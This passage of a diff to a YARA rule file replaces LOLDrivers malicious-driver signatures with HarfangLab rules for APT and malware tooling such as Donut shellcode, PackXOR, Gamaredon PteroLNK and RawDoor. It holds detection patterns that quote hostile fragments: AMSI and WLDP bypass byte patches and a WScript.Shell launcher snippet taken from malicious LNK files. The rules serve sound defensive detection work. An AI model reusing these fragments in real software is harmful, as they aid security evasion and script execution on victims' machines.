-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "6908ebf52eb19c6719a0b508d1e2128f198d10441551cbfb9f4031d382f5229f"
-		logic_hash = "9cde0a399b852038979993375be2a6d0f9f9f760381e94df0190256e8810949f"
-		score = 70
+		description = "Detects the Nim downloader from the Supposed Grasshopper campaign."
+		author = "HarfangLab"
+		id = "e53656b5-a1be-53f0-a4d4-908f24e08bd6"
+		date = "2024-06-20"
+		modified = "2025-04-16"
+		reference = "TRR240601"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L433-L448"
+		license_url = "N/A"
+		logic_hash = "93509319ab8028b0215fcfb81d1ff5d3d810922999f1dd8359b706a965221b2f"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file,memory"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00570041004e0020005400720061006e00730070006f007200740020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e0031002e0037003600300030002e003900330038 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e0031002e0037003600300030002e003900330038 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00770061006e00740064002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f00660074002000570069006e0064006f007700730020004f007000650072006100740069006e0067002000530079007300740065006d }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00770061006e00740064002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$pdb_path = "C:\\Users\\or\\Desktop\\nim-" ascii
+		$code = "helo.nim" ascii
+		$function_1 = "DownloadExecute" ascii fullword
+		$function_2 = "toByteSeq" ascii fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule LOLDRIVERS_MAL_Driver_Tonecinc_Idmtdisys_Internetdownloadmanager_2C1B
+rule HARFANGLAB_Donut_Shellcode : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - idmtdi.sys"
-		author = "Florian Roth"
-		id = "f09f5edb-c807-599a-8caa-7d892f315462"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L728-L749"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "2c1b65c2988b337182f1ba57b404793454e30a7fd328d34bc2e79857dc437a4a"
-		hash = "44ebb0f534e7cdfec06d5234358d219798a313219b214d72aa23afc5a57d7ea9"
-		hash = "77225a99b2e0e2b4007fb2f5a96d356e13deab45b9ef54c175d5452de8a211a7"
-		logic_hash = "e15700f9f1431b8d9c5682726839c2e30c66394c90e572f22e061cec44f99710"
-		score = 70
+		description = "Detects Donut shellcode in memory."
+		author = "HarfangLab"
+		id = "54facb12-3f33-5430-b4bf-0d223dc2a413"
+		date = "2024-06-20"
+		modified = "2025-04-16"
+		reference = "TRR240601"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L449-L497"
+		license_url = "N/A"
+		logic_hash = "1bf4e253195e39cc0b3cf45797c35a9f06078350aa35e65d9d36adbcc09a150b"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "memory"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0049006e007400650072006e0065007400200044006f0077006e006c006f006100640020004d0061006e006100670065007200200054004400490020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0054006f006e0065006300200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e00330032002e0033002e00380030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e00330032002e0033002e0031 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00690064006d007400640069002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0049006e007400650072006e0065007400200044006f0077006e006c006f006100640020004d0061006e0061006700650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00690064006d007400640069002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a9002000310039003900390020002d0020003200300031003800200054006f006e0065006300200049006e0063002e }
+		$amsi_patch = { 48 8B 44 24 (28 | 30) 83 20 00 33 C0 C3 }
+		$wldp_patch = { 41 C7 00 01 00 00 00 33 C0 C3 }
+		$api_hashing = { 8B C2 C1 C9 08 41 03 C8 8B D3 41 33 C9 C1 CA 08 41 03 D1 41 C1 C0 03 41 33 D2 41 C1 C1 03 44 33 CA 44 33 C1 41 FF C2 41 8B DB 44 8B D8 41 83 FA 1B }
+		$loaded_dlls = "ole32;oleaut32;wininet;mscoree;shell32" ascii
+		$function_1 = "WldpQueryDynamicCodeTrust" ascii
+		$function_2 = "WldpIsClassInApprovedList" ascii
+		$function_3 = "AmsiInitialize" ascii
+		$function_4 = "AmsiScanBuffer" ascii
+		$function_5 = "AmsiScanString" ascii
 
 	condition:
-		all of them
+		uint8( 0 ) == 0xE8 and ( ( #amsi_patch > 1 and $wldp_patch and $api_hashing ) or ( $loaded_dlls and all of ( $function_* ) ) )
 }
-rule LOLDRIVERS_MAL_Driver_Dwadsafeloadsys_E112
+rule HARFANGLAB_Muddywater_Ateraagent_Operators : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_e1123b59.sys"
-		author = "Florian Roth"
-		id = "ca8a37aa-8bb6-5cf6-ae3a-4747611571a0"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L752-L771"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "e1123b59a801e243a64270d0c6ab1277e5e3afba9c19023807409f53c1b0204b"
-		logic_hash = "478f361102f57948fedbc00b49f0874b915b2fc65bb4be900593da8ad4fe24d3"
-		score = 70
+		description = "Detect Atera Agent abused by MuddyWater"
+		author = "HarfangLab"
+		id = "1494a0da-92de-5cfb-a870-325d02e2cdfb"
+		date = "2024-04-17"
+		modified = "2025-04-16"
+		reference = "TRR240402"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L498-L528"
+		license_url = "N/A"
+		hash = "9b49d6640f5f0f1d68f649252a96052f1d2e0822feadd7ebe3ab6a3cadd75985"
+		logic_hash = "63d5d3a6723191dccd20c8d9f25607df512b91f57ac891ef8c87b2dd107ee5a2"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]5ba262377aef52a08f7d9a7152a8 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]6e56531776fe7f517f517edc79d1628067099650516c53f8 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032003000320032002e0031002e00310036002e0031003000300030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032003000320032002e0031002e00310036002e0031003000300030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00640077006100640073006100660065006c006f00610064002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]76fe7f514e3b52a896325fa17cfb7edf }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00640077006100640073006100660065006c006f00610064002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000320032 }
+		$s1 = "COMPANYID001Q3000009snPyIAIACCOUNTID"
+		$s2 = "COMPANYID001Q3000006FpmoIACACCOUNTID"
+		$s3 = "COMPANYID001Q3000008IyacIACACCOUNTID"
+		$s4 = "COMPANYID001Q3000009QoSEIA0ACCOUNTID"
+		$s5 = "COMPANYID001Q30000023c7iIAAACCOUNTID"
+		$s6 = "COMPANYID001Q3000008qXbDIAUACCOUNTID"
+		$s7 = "COMPANYID001Q3000008cfLjIAIACCOUNTID"
+		$s8 = "COMPANYID001Q3000007hJubIAEACCOUNTID"
+		$s9 = "COMPANYID001Q3000008ryO3IAIACCOUNTID"
+		$s10 = "COMPANYID001Q300000A5nnAIARACCOUNTID"
+		$s11 = "COMPANYID001Q3000008JfioIACACCOUNTID"
+		$s12 = "COMPANYID001Q300000BeUp3IAFACCOUNTID"
+		$s13 = "COMPANYID001Q3000005gMamIAEACCOUNTID"
+		$s15 = "mrrobertcornish@gmail.comINTEGRATORLOGINCOMPANYID"
+		$cert1 = { 0A 28 49 99 78 E5 89 8D F4 0A 23 8E B8 A5 52 E8 }
+		$cert2 = { 06 7F 60 47 95 66 24 A7 15 99 61 74 3D 81 94 93 }
 
 	condition:
-		all of them
+		filesize > 1MB and filesize < 4MB and ( uint16be( 0 ) == 0xD0CF ) and any of ( $s* ) and any of ( $cert* )
 }
-rule LOLDRIVERS_MAL_Driver_Paloaltonetworksinc_Cyvrlpcsys_Cortexxdradvancedendpointprotection_2CD7
+rule HARFANGLAB_Packxor : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - idmtdi.sys"
-		author = "Florian Roth"
-		id = "e0bb1b7c-2ce2-5ab8-96fe-0f1d7c26c8b3"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L774-L793"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "2cd7a0c4e8d24404c92e4ed8539b2136028a8ca663f3432e417b00665493e13f"
-		logic_hash = "8f4bf095708c18a441369088b362fb65779c7009bf1c2e8ac2a8e06ef0af44c0"
-		score = 70
+		description = "Detection rule for PackXOR"
+		author = "Harfanglab"
+		id = "6b4b6d61-b698-5e15-90b1-de2bdb76e425"
+		date = "2024-08-05"
+		modified = "2025-04-16"
+		reference = "https://harfanglab.io/insidethelab/unpacking-packxor/"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L529-L668"
+		license_url = "N/A"
+		hash = "0506372e2c2b6646c539ac5a08265dd66d0da58a25545e444c25b9a02f8d9a44"
+		logic_hash = "ecc7e241f98da8bcd248493f6443676e4c1e516f1fd19f488a62acd314be1898"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0043006f007200740065007800200058004400520020004c005000430020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500061006c006f00200041006c0074006f0020004e006500740077006f0072006b0073002c00200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0038002e0032002e0032002e00340039003700300038 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0038002e0032002e0032002e00340039003700300038 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0063007900760072006c00700063002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0043006f00720074006500780020005800440052212200200041006400760061006e00630065006400200045006e00640070006f0069006e0074002000500072006f00740065006300740069006f006e }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0063007900760072006c00700063002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a9002000500061006c006f00200041006c0074006f0020004e006500740077006f0072006b0073002c00200049006e0063002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064 }
+		$s_packer_xor = {
+            4? 63 [3]                       // movsxd  rax, dword [rsp+0x50 {var_78}]
+            4? 8b [2-6]                     // mov     rcx, qword [rsp+0xd0 {arg_8}]
+            4? 8b [2-6]                     // mov     rcx, qword [rcx+0x8]
+            4? 0? [2]                       // add     rax, qword [rcx+0x50]
+            4? 8d [5]                       // lea     rcx, [rel data_140003020]
+            0f (b6|b7) [1-5]                // movzx   eax, byte [rcx+rax]
+            0f (b6|b7) [1-5]                // movzx   ecx, byte [rel data_14002399c]
+            4? 8b [2-6]                     // mov     rdx, qword [rsp+0xd0 {arg_8}]
+            4? 8b [2-6]                     // mov     rdx, qword [rdx+0x8]
+            4? 0? [2]                       // add     rcx, qword [rdx+0x68]
+            0f (b6|b7) [1-5]                // movzx   ecx, cl
+            33 ??                           // xor     eax, ecx
+            4? 63 [3]                       // movsxd  rcx, dword [rsp+0x50 {var_78}]
+            4? 8b [2-6]                     // mov     rdx, qword [rsp+0xd0 {arg_8}]
+            4? 8b [2-6]                     // mov     rdx, qword [rdx+0x8]
+            4? 0? [2]                       // add     rcx, qword [rdx+0x48]
+            4? 8d [5]                       // lea     rdx, [rel data_140003020]
+            88 04 0a                        // mov     byte [rdx+rcx], al
+            0f (b6|b7)                      // movzx   eax, byte [rel data_14000301e]
+        }
+		$s_packer_decrypt_conf = {
+            8b [1-3]            // mov     eax, dword [rsp+0x4 {i}]
+            ff ??               // inc     eax
+            89 [1-3]            // mov     dword [rsp+0x4 {i}], eax
+            0f b6 [1-3]         // movzx   eax, byte [rsp {var_128}]
+            39 [1-3]            // cmp     dword [rsp+0x4 {i}], eax
+            73 ??               // jae     0x140001d59
+            8b [1-3]            // mov     eax, dword [rsp+0x4 {i}]
+            83 ?? 05            // add     eax, 0x5
+            8b ??               // mov     eax, eax
+            4? 8b [2-6]         // mov     rcx, qword [rsp+0x130 {arg_8}]
+            0f be [1-3]         // movsx   eax, byte [rcx+rax]
+            85 ??               // test    eax, eax
+            74 ??               // je      0x140001d40
+            0f b6 [1-3]         // movzx   eax, byte [rsp+0x2 {var_126}]
+            8b [3]              // mov     ecx, dword [rsp+0x4 {i}]
+            83 ?? 05            // add     ecx, 0x5
+            8b ??               // mov     ecx, ecx
+            4? 8b [4-6]         // mov     rdx, qword [rsp+0x130 {arg_8}]
+            0f (be|bf) [1-3]    // movsx   ecx, byte [rdx+rcx]
+            33 ??               // xor     eax, ecx
+            2b [1-3]            // sub     eax, dword [rsp+0x4 {i}]
+            ff ??               // dec     eax
+            8b [1-3]            // mov     ecx, dword [rsp+0x4 {i}]
+            88 [1-3]            // mov     byte [rsp+rcx+0x20 {var_108}], al
+            eb ??               // jmp     0x140001d57
+            b8 01 00 00 00      // mov     eax, 0x1
+            4? 6b ?? 00         // imul    rax, rax, 0x0
+            4? 8b [4-6]         // mov     rcx, qword [rsp+0x130 {arg_8}]
+            c6 [1-3] 00         // mov     byte [rcx+rax], 0x0
+            eb ??               // jmp     0x140001d59
+            eb                  // jmp     0x140001ce7
+        }
+		$s_packer_find_entry_point = {
+            4? 63 [1-4]             // movsxd  rax, dword [rsp {var_38_1}]
+            4? 3b [1-4]             // cmp     rax, qword [rsp+0x20 {var_18_1}]
+            73 ??                   // jae     0x140001c7f
+            48 8b [1-4]             // mov     rax, qword [rsp+0x10 {var_28_1}]
+            0f b7 [1-4]             // movzx   eax, word [rax]
+            c1 ?? 0c                // sar     eax, 0xc
+            83 ?? 0a                // cmp     eax, 0xa
+            75 ??                   // jne     0x140001c7d
+            4? 8b [1-4]             // mov     rax, qword [rsp+0x8 {var_30}]
+            8b [1-4]                // mov     eax, dword [rax]
+            4? 03 [1-4]             // add     rax, qword [rsp+0x40 {arg_8}]
+            4? 8b [1-4]             // mov     rcx, qword [rsp+0x10 {var_28_1}]
+            0f b7 [1-4]             // movzx   ecx, word [rcx]
+            81 ?? ff 0f 00 00       // and     ecx, 0xfff
+            4? 63 [1-4]             // movsxd  rcx, ecx
+            4? 03 [1-4]             // add     rax, rcx
+            4? 89 [1-4]             // mov     qword [rsp+0x18 {var_20_1}], rax
+            4? 8b [1-4]             // mov     rax, qword [rsp+0x18 {var_20_1}]
+            4? 8b [1-4]             // mov     rax, qword [rax]
+            4? 03 [1-4]             // add     rax, qword [rsp+0x50 {arg_18}]
+            4? 8b [1-4]             // mov     rcx, qword [rsp+0x18 {var_20_1}]
+            4? 89 [1-4]             // mov     qword [rcx], rax
+            eb 93                   // jmp     0x140001c12
+        }
+		$s_packer_find_entry_point_rtlcreateuserthtread = {
+            4? 8b [1-4]                // mov     rax, qword [rsp+0x70 {var_58_1}]
+            8b [1-4]                   // mov     eax, dword [rax+0x28]
+            4? 03 [1-4]                // add     rax, qword [rsp+0x68 {var_60_1}]
+            4? 89 [2-6]                // mov     qword [rsp+0x88 {var_40_1}], rax
+            ff [2-6]                   // call    qword [rsp+0x88 {var_40_1}]
+            4? 8d [2-6]                // lea     rax, [rsp+0x9c {var_2c}]
+            4? 89 [1-4]                // mov     qword [rsp+0x48 {var_80_1}], rax {var_2c}
+            4? 8d [2-6]                // lea     rax, [rsp+0xb8 {var_10}]
+            4? 89 [1-4]                // mov     qword [rsp+0x40 {var_88_1}], rax {var_10}
+            4? c7 [3-7]                // mov     qword [rsp+0x38 {var_90}], 0x0
+            4? 8b [2-6]                // mov     rax, qword [rsp+0x88 {var_40_1}]
+            4? 89 [1-4]                // mov     qword [rsp+0x30 {var_98_1}], rax
+            4? c7 [3-7]                // mov     qword [rsp+0x28 {var_a0}], 0x0
+            4? c7 [3-7 ]               // mov     qword [rsp+0x20 {var_a8}], 0x0
+            4? 33 ??                   // xor     r9d, r9d  {0x0}
+            4? ?? 01                   // mov     r8b, 0x1
+            33 ??                      // xor     edx, edx  {0x0}
+            4? c? ?? ff ff ff ff       // mov     rcx, 0xffffffffffffffff
+            ff                         // call    qword [rsp+0xa0 {var_28_1}]
+        }
+		$s_packer_string_encryption = {
+            0f B? [1-2]      // movzx   eax, [rsp+128h+size_string]
+            39 [1-3]         // cmp     [rsp+128h+var_124], eax
+            73 ??            // jnb     short loc_140001CC9
+            8B [1-3]         // mov     eax, [rsp+128h+var_124]
+            83 ?? 05         // add     eax, 5
+            8B ??            // mov     eax, eax
+            4? 8B [1-6]      // mov     rcx, [rsp+128h+arg_0]
+            0F B? [1-2]      // movsx   eax, byte ptr [rcx+rax]
+            85 ??            // test    eax, eax
+            74 ??            // jz      short loc_140001CB0
+            0f B? [1-3]      // movzx   eax, [rsp+128h+key]
+            8B [1-3]         // mov     ecx, [rsp+128h+var_124]
+            83 ?? 05         // add     ecx, 5
+            8B ??            // mov     ecx, ecx
+            4? 8B [1-6]      // mov     rdx, [rsp+128h+arg_0]
+            0F B? [1-2]      // movsx   ecx, byte ptr [rdx+rcx]
+            33 ??            // xor     eax, ecx
+            2B [1-3]         // sub     eax, [rsp+128h+var_124]
+            FF ??            // dec     eax
+            8B [1-3]         // mov     ecx, [rsp+128h+var_124]
+            88 [1-3]         // mov     [rsp+rcx+128h+decrypted_string], al
+            EB               // jmp     short loc_140001CC7
+        }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 20MB and 2 of ( $s_packer* )
 }
-rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Srvnetsys_Microsoftwindowsoperatingsystem_F6C3
+rule HARFANGLAB_Gamaredon_Pterolnk_Vbscript : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - WinTapix.sys, SRVNET2.SYS"
-		author = "Florian Roth"
-		id = "3559718f-59d7-5bff-860c-6a073f4c05d9"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L796-L815"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "f6c316e2385f2694d47e936b0ac4bc9b55e279d530dd5e805f0d963cb47c3c0d"
-		logic_hash = "ab1aea5cec71668c0e35ea149b9e537c8468738c3b3e70382ebedf51bb8729d0"
-		score = 70
+		description = "Matches Gamaredon PteroLNK VBScript samples used in late 2024 to early 2025"
+		author = "HarfangLab"
+		id = "3781749e-7f4e-55db-bdf7-2a0a056f41f4"
+		date = "2025-04-04"
+		modified = "2025-04-16"
+		reference = "TRR250401"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L669-L688"
+		license_url = "N/A"
+		hash = "d5538812b9a41b90fb9e7d83f2970f947b1e92cb68085e6d896b97ce8ebff705"
+		logic_hash = "b6aad0ca4653c111a4f481f9d4636e272712dc7ad53fa3b2041f2c47a1eee527"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0053006500720076006500720020004e006500740077006f0072006b0020006400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310030002e0030002e00310038003300360032002e0036003900330020002800570069006e004200750069006c0064002e003100360030003100300031002e00300038003000300029 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310030002e0030002e00310038003300360032002e003600390033 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005300520056004e004500540032002e005300590053 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f0066007400ae002000570069006e0064006f0077007300ae0020004f007000650072006100740069006e0067002000530079007300740065006d }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005300520056004e004500540032002e005300590053 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a90020004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$vbs = "on error resume next" ascii wide
+		$a1 = "=\"b24gZXJyb3IgcmVzdW1lIG5leHQNC" ascii wide
+		$b1 = "\"\"%PUBLIC%\"\"" ascii wide
+		$b2 = "\"\"%APPDATA%\"\"" ascii wide
+		$b3 = "\"\"REG_DWORD\"\"" ascii wide
 
 	condition:
-		all of them
+		filesize < 400KB and $vbs in ( 0 .. 2 ) and $a1 and 1 of ( $b* )
 }
-rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Wantdsys_Microsoftwindowsoperatingsystem_81C7
+rule HARFANGLAB_Gamaredon_Pterolnk_LNK : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - wantd_3.sys"
-		author = "Florian Roth"
-		id = "43ae822a-c4c4-5525-bfd3-a05d1ec50bd0"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L818-L837"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1"
-		logic_hash = "ec9e321bbc89bffb6243e3edde45e60dc06513e88dfb9a262768ef081db60c5b"
-		score = 70
-		quality = 80
-		tags = ""
+		description = "Matches Gamaredon PteroLNK-generated LNK files used in late 2024 to early 2025"
+		author = "HarfangLab"
+		id = "e6e0c2cb-049a-5d80-b167-56079aefe38b"
+		date = "2025-04-04"
+		modified = "2025-04-16"
+		reference = "TRR250401"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L689-L707"
+		license_url = "N/A"
+		hash = "n/a"
+		logic_hash = "69565365da1632407e223f87978a91543b1281879aa372cd055d08e26e1a2d93"
+		score = 75
+		quality = 78
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00570041004e0020005400720061006e00730070006f007200740020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0035002e0032002e0033003700390030002e003900330038 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0035002e0032002e0033003700390030002e003900330038 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00770061006e00740064002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f00660074002000570069006e0064006f007700730020004f007000650072006100740069006e0067002000530079007300740065006d }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00770061006e00740064002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$a1 = "javascript:eval('w=new%20ActiveXObject(\\\"\"WScript.Shell\\\"\");w.run(\\\"\"wscript.exe //e:vb\"\"+\"\"Script" ascii wide
+		$a2 = "javascript:eval('w=new%20ActiveXObject(\\\"\"WScript.Shell\\\"\");w.run(\\\"\"explorer" ascii wide
+		$b1 = "\"\");window.close()')" ascii wide nocase
 
 	condition:
-		all of them
+		filesize < 10KB and uint32( 0 ) == 0x0000004C and uint32( 4 ) == 0x00021401 and 1 of ( $a* ) and $b1
 }
-rule LOLDRIVERS_MAL_Driver_773B
+rule HARFANGLAB_Apt31_Rawdoor_Dropper : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
-		author = "Florian Roth"
-		id = "f47ab2f1-86f6-5550-939e-4477ec1c367c"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L840-L854"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "773b4a1efb9932dd5116c93d06681990759343dfe13c0858d09245bc610d5894"
-		logic_hash = "5e01850384ac0dc0e9f33e3e217e0e824cfe3c2bb46feff94dffa070f2f7c9a0"
-		score = 70
+		description = "Matches the RawDoor dropper"
+		author = "HarfangLab"
+		id = "b278a157-20e2-5271-aca0-0692929b881d"
+		date = "2024-04-12"
+		modified = "2025-04-16"
+		reference = "TRR240401"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L708-L729"
+		license_url = "N/A"
+		hash = "c3056e39f894ff73bba528faac04a1fc86deeec57641ad882000d7d40e5874be"
+		logic_hash = "d0cbe02c4fafb4895bd0126d2496802a3fee6a0362e55bfa91cfd1c75043d94a"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0031002e0031002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0031002e0031002e0030 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d002000320030003100370020 }
+		$service_target = "%SystemRoot%\\system32\\svchost.exe -k netsvcs" ascii
+		$service_dispname = "Microsoft .NET Framework NGEN" ascii
+		$drop_name = "~DF313.msi" ascii
+		$msg1 = "RegOpenKeyEx %s  error:%d\x0D\x0A" ascii
+		$msg2 = "RegDeleteValue Wow64 . %d\x0D\x0A" ascii
+		$msg3 = "CreateService %s success! but Start Faile.. %d\x0D\x0A" ascii
+		$msg4 = "OutResFile to %s%s False!" ascii
+		$msg5 = "Can't GetNetSvcs Buffer!" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and filesize > 350KB and filesize < 600KB and ( ( $service_target and $service_dispname and $drop_name ) or 3 of ( $msg* ) )
 }
-rule LOLDRIVERS_MAL_Driver_Sensecorp_7F45
+rule HARFANGLAB_Apt31_Rawdoor_Payload : FILE
 {
 	meta:
